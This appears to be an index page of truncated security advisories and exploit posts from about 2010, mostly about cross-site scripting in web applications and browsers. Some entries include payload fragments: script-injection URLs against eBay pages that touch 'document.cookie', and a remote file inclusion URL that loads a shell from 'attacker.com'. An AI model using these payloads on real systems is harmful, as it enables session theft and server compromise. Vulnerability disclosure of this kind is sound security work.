Oracle Sun Java System Web Server - HTTP Response Splitting
Oracle Sun Java System Web Server - HTTP Response Splitting Description Security-Assessment.com discovered that it is possible to successfully perform an HTTP Response Splitting attack against applications served by Sun Java System Web Server. The vulnerability can be exploited if user supplied inpu...
Joomla Restaurant Guide Cross Site Scripting / Local File Inclusion / SQL Injection
Exploit Title: Joomla Component comrestaurantguide Multiple Vulnerabilities Date: 18.09.2010 Author: Valentin Category: webapps/0day Version: 1.0.0 Tested on: Debian lenny, Apache2, MySQL 5, Joomla 1.5.x CVE : Code : :::::::::::::::::::::::::::::::::::::: 0x1 :::::::::::::::::::::::::::::::::::::...
WordPress Plugin Events Manager Extended - Persistent Cross-Site Scripting
WordPress Plugin Events Manager Extended - Persistent Cross-Site Scripting Author: Craw Email: [email protected] Software Link: http://wordpress.org/extend/plugins/events-manager-extended/ Version: 3.1.2 Category: webapplications ======================================================= + ExploiT 1 ...
E-Bay Cross Site Scripting
http://donations.ebay.com/charity/charity.jsp?NPID=40219&name= "alert'XSS' http://worldofgood.ebay.com/Handmade-Jewelry-Earrings-Necklaces-Rings/47/list ?"alert'XSS' http://worldofgood.ebay.com/list?" http://sea.ebay.com/searchAnnoucement.php?time= "alertdocument.cookie...
Rekonq 0.5 Cross Site Scripting
Nth Dimension Security Advisory NDSA20100818 Date: 18th August 2010 Author: Tim Brown URL: / Product: Rekonq 0.5 Vendor: Andrea Diamantini Risk: Medium Summary The Rekonq web browser is vulnerable to Javascript injection in a number of components of...
Medium security hole in Rekonq web browser
Nth Dimension Security Advisory NDSA20100818 Date: 18th August 2010 Author: Tim Brown mailto:[email protected] URL: http://www.nth-dimension.org.uk/ / http://www.machine.org.uk/ Product: Rekonq 0.5 http://rekonq.sourceforge.net/ Vendor: Andr...
iScripts EasyBiller - Cross-Site Scripting
iScripts EasyBiller - Cross-Site Scripting $------------------------------------------------------------------------------------------------------------------- $ iScripts EasyBiller Cross Site Scripting Vulnerabilities $ Author : Sangteamtham $ Home : Hcegroup.net $ Download :...
iScripts EasyBiller - Cross-Site Scripting
$------------------------------------------------------------------------------------------------------------------- $ iScripts EasyBiller Cross Site Scripting Vulnerabilities $ Author : Sangteamtham $ Home : Hcegroup.net $ Download : http://www.iscripts.com/easybiller/ $ Date : 02/07/2010 $ Emai...
CVE-2010-0541 Ruby WEBrick javascript injection flaw
Cross-site scripting (XSS) vulnerability in the WEBrick HTTP server in Ruby in Apple Mac OS X 10.5.8, and 10.6 before 10.6.4, allows remote attackers to inject arbitrary web script or HTML via a crafted URI that triggers a UTF-7 error page...
Paessler - PRTG Traffic Grapher XSS
aushack.com - Vulnerability Advisory ----------------------------------------------- Release Date: 08-Jun-2010 Software: Paessler - PRTG Traffic Grapher http://www.paessler.com "PRTG Network Monitor runs 24/7 on a Windows-based machine within your network, recording network usage parameters...
Paessler PRTG Traffic Grapher 6.2.1.945 Cross Site Scripting
aushack.com - Vulnerability Advisory ----------------------------------------------- Release Date: 08-Jun-2010 Software: Paessler - PRTG Traffic Grapher http://www.paessler.com "PRTG Network Monitor runs 24/7 on a Windows-based machine within your network, recording network usage parameters...
Google Chrome 4.1.249.1059 Cross Origin Bypass
Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL GURL CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663 Author: Jordi Chancel Software Link: http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html Description: The Google URL Parsing...
leaftec CMS - Multiple Vulnerabilities
leaftec CMS - Multiple Vulnerabilities Exploit Title: leaftec cms multiple vulnerabilities Date: 21.03.2010 Author: Valentin Höbel Version: Tested on: Debian etch CVE : Code : :: General information :: leaftec cms multiple vulnerabilities discovered :: by Valentin Höbel :: [email protected] ...
Vbulletin Blog 4.0.2 XSS Vulnerability
Exploit for php platform in category web applications ====================================== Vbulletin Blog 4.0.2 XSS Vulnerability ====================================== Author: FormatXformat Version: Vbulletin 4.0.2 Dork: Powered by vBulletin Version 4.0.2 Copyright 2010 vBulletin Solutions, In...
Silverstripe CMS 2.3.4 Cross Site Scripting
Silverstripe CMS, , version 2.3.4 and lower and its unreleased 2.4 branch, is vulnerable to two Cross Site Scripting issues. 1. The comment posting mechanism of Silverstripe 'PostCommentForm' fails to properly sanitize the 'CommenterURL' parameter...
FDF Files Containing Timed JavaScript (CVE-2009-3956)
FDF is a file format used for representing form data and annotations that are contained in a PDF form. A remote attacker may exploit this issue to inject JavaScript into a PDF file from any domain on the internet. When Acrobat loads an FDF file, there is no check to ensure that the target file,...
2009 You! Hostit! XSS
No description provided by source. andresg888 Contact : andresg8884tgmaildotcom Web: : www.ilegalintrusion.net & www.bl4ck-p0rtal.org Dork : No DoRk f0R ScRipT KiDDieS Example:...
DPI 1.1-final Powered by Clixint XSS
No description provided by source. andresg888 Vendor : http://www.image-host-script.com/ Contact : andresg8884tgmaildotcom Web: : www.ilegalintrusion.net & www.bl4ck-p0rtal.org Dork : No DoRk f0R ScRipT KiDDieS Example1:...
Kide Shoutbox 0.4.6 - Cross-Site Scripting AXFR
Kide Shoutbox 0.4.6 - Cross-Site Scripting AXFR andresg888 Web: : www.ilegalintrusion.net & www.bl4ck-p0rtal.org Exploit : Go to the shoutbox and type: red text or hi or 3xplo!t : http://server/path/include/prodler.class.php?sPath=http://attacker.com/shell.txt??? Greetz : 84kur10 , Brunos50 Speci...
Fedora Core 10 FEDORA-2009-10377 (python-markdown2)
The remote host is missing an update to python-markdown2 announced via advisory FEDORA-2009-10377. OpenVAS Vulnerability Test $Id: fcore200910377.nasl 6624 2017-07-10 06:11:55Z cfischer $ Description: Auto-generated from advisory FEDORA-2009-10377 python-markdown2 Authors: Thomas Reinke Copyright...